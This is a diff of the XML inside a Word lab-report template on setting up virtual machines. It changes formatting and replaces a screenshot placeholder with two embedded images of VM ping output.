--- a/VM_Setup_Testing.docx
+++ b/VM_Setup_Testing.docx
@@ -1,23 +1,23 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -28,14 +28,14 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -44,7 +44,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -53,7 +53,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -64,61 +64,97 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This document outlines the major steps you will have to take, but it’s incomplete in the sense that it doesn’t provide you with step-by-step instructions. You will need to fill in the gaps yourself. There are no restrictions on resources that can be used to complete the assignment. This includes consulting with other students and the instructor. We only ask that you will not share your report with other students. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">You may use this document as a template to your report. Add your additional steps and answer the questions as you work through the studio. Your final report should be submitted to </w:t>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This document outlines the major steps you will have to take, but it’s incomplete in the sense that it doesn’t provide you with step-by-step instructions. You will need to fill in the gaps yourself. There are no restrictions on resources that can be used to complete the assignment. This includes consulting with other students and the instructor. We only ask that you </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>will not</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> share your report with other students. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">You may use this document as a template </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> your report. Add your additional steps and answer the questions as you work through the studio. Your final report should be submitted to </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -127,7 +163,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -138,32 +174,54 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:b w:val="1"/>
-          <w:bCs w:val="1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Part 1: Downloading and Installing the VMs</w:t>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Part 1: Downloading and </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Installing</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the VMs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -171,18 +229,18 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
+          <w:numId w:val="9"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -194,38 +252,54 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
+          <w:numId w:val="9"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Take a screenshot of (each of) your VMs showing their output from the command “ping 8.8.8.8” with a successful reply, and include the screenshot here.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Take a screenshot of (each of) your VMs showing their output from the command “ping 8.8.8.8” with a successful </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>reply, and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> include the screenshot here.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -234,48 +308,145 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>PASTE SCREENSHOTS HERE:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280516DF" wp14:editId="1F8C3E78">
+            <wp:extent cx="5939155" cy="4453255"/>
+            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
+            <wp:docPr id="1068891921" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5939155" cy="4453255"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1181ABA8" wp14:editId="011F53E1">
+            <wp:extent cx="5943600" cy="4457700"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="23199856" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 2"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="4457700"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -284,30 +455,29 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
